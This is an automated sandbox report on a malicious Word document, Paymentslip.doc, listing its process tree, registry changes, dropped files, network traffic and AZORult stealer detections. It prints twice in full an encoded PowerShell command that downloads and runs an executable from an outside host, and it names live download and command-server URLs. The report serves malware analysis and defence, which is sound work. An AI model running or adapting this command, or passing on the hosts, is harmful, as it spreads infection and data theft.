PackagePartXmlDataFontsFontSigUsb1:	4000ACFF
PackagePartXmlDataFontsFontSigUsb2:	00000001
PackagePartXmlDataFontsFontSigUsb3:	00000000
PackagePartXmlDataFontsFontSigCsb0:	0000019F
PackagePartXmlDataFontsFontSigCsb1:	00000000
PackagePartXmlDataWebSettingsIgnorable:	w14 w15
PackagePartXmlDataWebSettingsOptimizeForBrowser:	-
PackagePartXmlDataWebSettingsAllowPNG:	-

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

Monitored processes

Malicious processes

Suspicious processes

Behavior graph

Click at the process to see the details

Process information

PID

CMD

Path

Indicators

Parent process

2396

"C:\Users\admin\Documents\WindowsUpdate.exe"

C:\Users\admin\Documents\WindowsUpdate.exe

powershell.exe

User:

admin

Integrity Level:

MEDIUM

Exit code:

Modules

Images
c:\users\admin\documents\windowsupdate.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\imm32.dll

2580

"C:\Windows\System32\cmd.exe" /C PoWerSHeLl -En ZgB1AG4AYwB0AGkAbwBuACAAeAA1AHAATgBKAFoAUQBSAGoANgBiAFEAUABxAFMAWABJAHUATQA0AHgAWgBqAFoATwBfADQAIAAoACAAJABjADcAVwBBAHMAbgBBADMAOABVAGIANgBvAE8AZwBpAEMASQB2AGoAUgBFAEgASgBOAHIAYQBlACAALAAgACQAVwBUAE4AOQBfAGUAeABUAEwANABzAG0ATgB4AFQAQgBwAHkAZwBuAFAAegBmAFAAIAApAHsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACAAJABjADcAVwBBAHMAbgBBADMAOABVAGIANgBvAE8AZwBpAEMASQB2AGoAUgBFAEgASgBOAHIAYQBlACAALAAgACQAVwBUAE4AOQBfAGUAeABUAEwANABzAG0ATgB4AFQAQgBwAHkAZwBuAFAAegBmAFAAIAApADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBjAG8AbQAgAFMAaABlAGwAbAAuAEEAcABwAGwAaQBjAGEAdABpAG8AbgApAC4AUwBoAGUAbABsAEUAeABlAGMAdQB0AGUAKAAgACQAVwBUAE4AOQBfAGUAeABUAEwANABzAG0ATgB4AFQAQgBwAHkAZwBuAFAAegBmAFAAIAApADsAIAB9AA0ACgB0AHIAeQB7AA0ACgANAAoAJABvAHcASgBSAEQATwBFAGsARABqAGwAdwA1AGkAUQBjADYAPQBbAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBHAGUAdABGAG8AbABkAGUAcgBQAGEAdABoACgAJwBNAHkARABvAGMAdQBtAGUAbgB0AHMAJwApACsAJwBcAFcAaQBuAGQAbwB3AHMAVQBwAGQAYQB0AGUALgBlAHgAZQAnADsADQAKAHgANQBwAE4ASgBaAFEAUgBqADYAYgBRAFAAcQBTAFgASQB1AE0ANAB4AFoAagBaAE8AXwA0ACAAJwBoAHQAdABwADoALwAvAGgAbwBzAHQALgB3AG8AcgBrAHMAawBpAGwAbABzAHcAZQBiAC4AbgBlAHQALwB+AG8AZAB5AHMAcwBlAHkALwByAG8AeQB0AC8AQwBIAEkAQgBCAEIALgBlAHgAZQAnACAAJABvAHcASgBSAEQATwBFAGsARABqAGwAdwA1AGkAUQBjADYAOwANAAoAJAB2AE4AdQBHAEwAYQB3AF8AYwBvAE4AWABCAEEAMwB3ADYAVQBNADQAcABoAHIAYgBNADcAdQB4AD0AJABlAG4AdgA6AEEAcABwAGQAYQB0AGEAKwAnAFwAVwBpAG4AZABvAHcAcwBVAHAAZABhAHQAZQAuAGUAeABlACcAOwANAAoAeAA1AHAATgBKAFoAUQBSAGoANgBiAFEAUABxAFMAWABJAHUATQA0AHgAWgBqAFoATwBfADQAIAAnAGgAdAB0AHAAOgAvAC8AaABvAHMAdAAuAHcAbwByAGsAcwBrAGkAbABsAHMAdwBlAGIALgBuAGUAdAAvAH4AbwBkAHkAcwBzAGUAeQAvAHIAbwB5AHQALwBDAEgASQBCAEIAQgAuAGUAeABlACcAIAAkAHYATgB1AEcATABhAHcAXwBjAG8ATgBYAEIAQQAzAHcANgBVAE0ANABwAGgAcgBiAE0ANwB1AHgAOwANAAoADQAKAH0AYwBhAHQAYwBoAHsAfQA=

C:\Windows\System32\cmd.exe

—

WINWORD.EXE

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows Command Processor

Exit code:

Version:

6.1.7601.17514 (win7sp1_rtm.101119-1850)

Modules

Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll

3104

PoWerSHeLl -En ZgB1AG4AYwB0AGkAbwBuACAAeAA1AHAATgBKAFoAUQBSAGoANgBiAFEAUABxAFMAWABJAHUATQA0AHgAWgBqAFoATwBfADQAIAAoACAAJABjADcAVwBBAHMAbgBBADMAOABVAGIANgBvAE8AZwBpAEMASQB2AGoAUgBFAEgASgBOAHIAYQBlACAALAAgACQAVwBUAE4AOQBfAGUAeABUAEwANABzAG0ATgB4AFQAQgBwAHkAZwBuAFAAegBmAFAAIAApAHsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACAAJABjADcAVwBBAHMAbgBBADMAOABVAGIANgBvAE8AZwBpAEMASQB2AGoAUgBFAEgASgBOAHIAYQBlACAALAAgACQAVwBUAE4AOQBfAGUAeABUAEwANABzAG0ATgB4AFQAQgBwAHkAZwBuAFAAegBmAFAAIAApADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBjAG8AbQAgAFMAaABlAGwAbAAuAEEAcABwAGwAaQBjAGEAdABpAG8AbgApAC4AUwBoAGUAbABsAEUAeABlAGMAdQB0AGUAKAAgACQAVwBUAE4AOQBfAGUAeABUAEwANABzAG0ATgB4AFQAQgBwAHkAZwBuAFAAegBmAFAAIAApADsAIAB9AA0ACgB0AHIAeQB7AA0ACgANAAoAJABvAHcASgBSAEQATwBFAGsARABqAGwAdwA1AGkAUQBjADYAPQBbAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBHAGUAdABGAG8AbABkAGUAcgBQAGEAdABoACgAJwBNAHkARABvAGMAdQBtAGUAbgB0AHMAJwApACsAJwBcAFcAaQBuAGQAbwB3AHMAVQBwAGQAYQB0AGUALgBlAHgAZQAnADsADQAKAHgANQBwAE4ASgBaAFEAUgBqADYAYgBRAFAAcQBTAFgASQB1AE0ANAB4AFoAagBaAE8AXwA0ACAAJwBoAHQAdABwADoALwAvAGgAbwBzAHQALgB3AG8AcgBrAHMAawBpAGwAbABzAHcAZQBiAC4AbgBlAHQALwB+AG8AZAB5AHMAcwBlAHkALwByAG8AeQB0AC8AQwBIAEkAQgBCAEIALgBlAHgAZQAnACAAJABvAHcASgBSAEQATwBFAGsARABqAGwAdwA1AGkAUQBjADYAOwANAAoAJAB2AE4AdQBHAEwAYQB3AF8AYwBvAE4AWABCAEEAMwB3ADYAVQBNADQAcABoAHIAYgBNADcAdQB4AD0AJABlAG4AdgA6AEEAcABwAGQAYQB0AGEAKwAnAFwAVwBpAG4AZABvAHcAcwBVAHAAZABhAHQAZQAuAGUAeABlACcAOwANAAoAeAA1AHAATgBKAFoAUQBSAGoANgBiAFEAUABxAFMAWABJAHUATQA0AHgAWgBqAFoATwBfADQAIAAnAGgAdAB0AHAAOgAvAC8AaABvAHMAdAAuAHcAbwByAGsAcwBrAGkAbABsAHMAdwBlAGIALgBuAGUAdAAvAH4AbwBkAHkAcwBzAGUAeQAvAHIAbwB5AHQALwBDAEgASQBCAEIAQgAuAGUAeABlACcAIAAkAHYATgB1AEcATABhAHcAXwBjAG8ATgBYAEIAQQAzAHcANgBVAE0ANABwAGgAcgBiAE0ANwB1AHgAOwANAAoADQAKAH0AYwBhAHQAYwBoAHsAfQA=

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

cmd.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows PowerShell

Exit code:

Version:

6.1.7600.16385 (win7_rtm.090713-1255)

Modules

Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll

3464

"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Paymentslip.doc"

C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

—

explorer.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Microsoft Word

Exit code:

Version:

14.0.6024.1000

Modules

Images
c:\program files\microsoft office\office14\winword.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll

3616

"C:\Users\admin\AppData\Roaming\WindowsUpdate.exe"

C:\Users\admin\AppData\Roaming\WindowsUpdate.exe

powershell.exe

User:

admin

Integrity Level:

MEDIUM

Exit code:

Modules

Images
c:\users\admin\appdata\roaming\windowsupdate.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\imm32.dll

3728

"C:\Users\admin\AppData\Roaming\WindowsUpdate.exe"

C:\Users\admin\AppData\Roaming\WindowsUpdate.exe

—

WindowsUpdate.exe

User:

admin

Integrity Level:

MEDIUM

Exit code:

Modules

Images
c:\users\admin\appdata\roaming\windowsupdate.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll

3864

"C:\Users\admin\Documents\WindowsUpdate.exe"

C:\Users\admin\Documents\WindowsUpdate.exe

WindowsUpdate.exe

User:

admin

Integrity Level:

MEDIUM

Exit code:

Modules

Images
c:\users\admin\documents\windowsupdate.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll

3960

"C:\Windows\explorer.exe"

C:\Windows\explorer.exe

—

WindowsUpdate.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows Explorer

Exit code:

Version:

6.1.7600.16385 (win7_rtm.090713-1255)

Modules

Images
c:\windows\explorer.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll

4044

"C:\Windows\explorer.exe"

C:\Windows\explorer.exe

—

WindowsUpdate.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows Explorer

Exit code:

Version:

6.1.7600.16385 (win7_rtm.090713-1255)

Modules

Images
c:\windows\explorer.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll

Add for printing

Total events

1 958

Read events

1 261

Write events

692

Delete events

Modification events


(PID) Process:	(3464) WINWORD.EXE	Key:	HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:	write	Name:	t2!
Value: 74322100880D0000010000000000000000000000
(PID) Process:	(3464) WINWORD.EXE	Key:	HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:	write	Name:	1033
Value: Off
(PID) Process:	(3464) WINWORD.EXE	Key:	HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:	write	Name:	1033
Value: On
(PID) Process:	(3464) WINWORD.EXE	Key:	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:	write	Name:	WORDFiles
Value: 1300627479
(PID) Process:	(3464) WINWORD.EXE	Key:	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:	write	Name:	ProductFiles
Value: 1300627600
(PID) Process:	(3464) WINWORD.EXE	Key:	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:	write	Name:	ProductFiles
Value: 1300627601
(PID) Process:	(3464) WINWORD.EXE	Key:	HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
Operation:	write	Name:	MTTT
Value: 880D0000BEF43E5A008DD40100000000
(PID) Process:	(3464) WINWORD.EXE	Key:	HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:	write	Name:	.3!
Value: 2E332100880D000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:	(3464) WINWORD.EXE	Key:	HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:	delete value	Name:	.3!
Value: 2E332100880D000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:	(3464) WINWORD.EXE	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:	write	Name:	UNCAsIntranet
Value: 0

Add for printing

Executable files

Suspicious files

Text files

Unknown types

Dropped files

PID	Process	Filename		Type
3464	WINWORD.EXE	C:\Users\admin\AppData\Local\Temp\CVRA674.tmp.cvr		—
		MD5:—	SHA256:—
3104	powershell.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DJL6JM9VXS6ZHQZTH6V5.temp		—
		MD5:—	SHA256:—
3104	powershell.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF13ae93.TMP		binary
		MD5:—	SHA256:—
2396	WindowsUpdate.exe	C:\Users\admin\AppData\Local\Temp\Disk.sys		executable
		MD5:—	SHA256:—
2396	WindowsUpdate.exe	C:\Users\admin\AppData\Local\Chrome\StikyNot.exe		executable
		MD5:—	SHA256:—
3104	powershell.exe	C:\Users\admin\AppData\Roaming\WindowsUpdate.exe		executable
		MD5:—	SHA256:—
3104	powershell.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms		binary
		MD5:—	SHA256:—
3616	WindowsUpdate.exe	C:\Users\admin\AppData\Local\Temp\Disk.sys		executable
		MD5:—	SHA256:—
3616	WindowsUpdate.exe	C:\Users\admin\AppData\Local\Chrome\StikyNot.exe		executable
		MD5:—	SHA256:—
3464	WINWORD.EXE	C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm		pgc
		MD5:—	SHA256:—

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

TCP/UDP connections

DNS requests

Threats

HTTP requests

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
3104	powershell.exe	GET	200	112.140.179.97:80	http://host.workskillsweb.net/~odyssey/royt/CHIBBB.exe	AU	executable	432 Kb	suspicious
3104	powershell.exe	GET	200	112.140.179.97:80	http://host.workskillsweb.net/~odyssey/royt/CHIBBB.exe	AU	executable	432 Kb	suspicious
3864	WindowsUpdate.exe	POST	200	185.126.200.160:80	http://www.admindocmarkens.us/chib/index.php	IR	text	2 b	malicious
3864	WindowsUpdate.exe	POST	200	185.126.200.160:80	http://www.admindocmarkens.us/chib/index.php	IR	binary	4.27 Mb	malicious

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
3104	powershell.exe	112.140.179.97:80	host.workskillsweb.net	SYNERGY WHOLESALE PTY LTD	AU	suspicious
3864	WindowsUpdate.exe	185.126.200.160:80	www.admindocmarkens.us	Tebyan-e-Noor Cultural-Artistic Institute	IR	malicious

DNS requests

Domain	IP	Reputation
host.workskillsweb.net	112.140.179.97	suspicious
www.admindocmarkens.us	185.126.200.160	malicious

Threats

PID	Process	Class	Message
3104	powershell.exe	Potential Corporate Privacy Violation	ET POLICY PE EXE or DLL Windows file download HTTP
3104	powershell.exe	Potentially Bad Traffic	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3104	powershell.exe	Potentially Bad Traffic	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3864	WindowsUpdate.exe	A Network Trojan was detected	ET TROJAN AZORult Variant.4 Checkin M2
3864	WindowsUpdate.exe	A Network Trojan was detected	MALWARE [PTsecurity] AZORult client request
3864	WindowsUpdate.exe	A Network Trojan was detected	MALWARE [PTsecurity] AZORult HTTP Header
3864	WindowsUpdate.exe	A Network Trojan was detected	MALWARE [PTsecurity] AZORult encrypted PE file
3864	WindowsUpdate.exe	A Network Trojan was detected	MALWARE [PTsecurity] AZORult HTTP Header
3864	WindowsUpdate.exe	A Network Trojan was detected	MALWARE [PTsecurity] AZORult client request

3 ETPRO signatures available at the full report

Add for printing

No debug info

General Info

Paymentslip.doc

BB8C9DB2445E7ECC4E4EEFC6ED1CB418

A5E390676EE75888494C3150ED913BF70882E9C6

FD24DE4D53E61EB7CD0C7B7B99552361DB2024B456568CB14ACCD6F59ADC3363

6144:+M516FgSNHUfWFqupSBUKTrOwl0hsXUEM9y:z6FgZWB0nOwl0hsXUEuy

Software environment set and analysis options

Launch configuration

Software preset

Hotfixes

Behavior activities

MALICIOUS

Starts CMD.EXE for commands execution

Unusual execution from Microsoft Office

Executes PowerShell scripts

Application was dropped or rewritten from another process

Downloads executable files from the Internet

Changes the autorun value in the registry

Connects to CnC server

AZORULT was detected

Actions looks like stealing of personal data

Loads dropped or rewritten executable

SUSPICIOUS

Creates files in the user directory

Application launched itself

Executable content was dropped or overwritten

INFO

Reads Microsoft Office registry keys

Creates files in the user directory

Malware configuration

Static information

TRiD

EXIF

XMP

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Registry activity

Modification events

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats

Debug output strings